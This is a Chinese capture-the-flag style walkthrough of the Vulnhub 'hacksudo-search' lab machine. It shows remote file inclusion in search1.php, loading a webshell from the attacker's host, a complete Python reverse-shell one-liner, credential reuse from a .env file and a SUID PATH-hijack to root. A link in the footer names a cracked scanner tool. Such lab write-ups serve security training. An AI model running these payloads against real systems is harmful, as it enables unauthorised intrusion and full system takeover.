Vulnhub_hacksudo-search

Posted NowSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_hacksudo-search相关的知识,希望对你有一定的参考价值。


主机信息

kali: 192.168.1.10
hacksudo-search: 192.168.1.9

信息收集

通过信息收集发信目标追击开发22、80两个端口

nmap -T4 -A -v 192.168.1.9


打开网站发现是一个搜索界面

查看源码也没有发现有价值的信息
通过目录扫描发现存在search1.php的文件


打开发现和之前80端口的默认网站基本相同,但多了几个功能

通过点击网页顶部的链接观察URL的变化,这个地方应该存在文件包含

经过测试在About中将Me改为小写me后存在文件包含漏洞

http://192.168.1.9/search1.php?me=/etc/passwd


然后在kali上开启http服务,验证存在RFI

既然存在RFI那么就可以写入webshell
首先创建一个php文件写入下载webshell的命令

上传webshell

然后在该目录下开启http服务

python -m SimpleHTTPServer 8888


浏览器访问构造的RFI链接后发现目标主机成功下载webshell.php

http://192.168.1.9/search1.php?me=http://192.168.1.10:8888/cmdexec.php


访问webshell

然后使用webshell中的命令执行功能反弹一个shell,经过测试目标主机需要使用python进行反弹

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



通过查看文件发现存在一个.env的文件,里面存在账号密码

使用这个密码登录mysql发现无法成功

然后试试ssh,发现可以登录hacksudo的账户

获取到第一个flag

提权

查看hacksudo目录下的文件发现一个具有SUID权限的文件


查看文件最后一部为执行install,那么我们创建一个install文件

echo "/bin/bash" > install


然后赋予777的权限

然后再修改一下变量

执行searchinstall后获取到root权限

获取到最后的flag

好书推荐

贾平凹刺穿命运之作,写给每一个在浮华都市里身心俱疲、困惑止步、孤独前行的你。每一本都是镜子,给你看清自己和人性;四本一起是利剑,你便可穿透命运的厚墙!

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

以上是关于Vulnhub_hacksudo-search的主要内容,如果未能解决你的问题,请参考以下文章

在区分源代码,对象代码,汇编代码和机器代码时,我有一个困惑

Java中普通代码块,构造代码块,静态代码块区别及代码示例

Java中普通代码块,构造代码块,静态代码块区别及代码示例2 构造代码块

Java中普通代码块,构造代码块,静态代码块区别及代码示例2 构造代码块

上古卷轴5代码

低代码究竟是啥?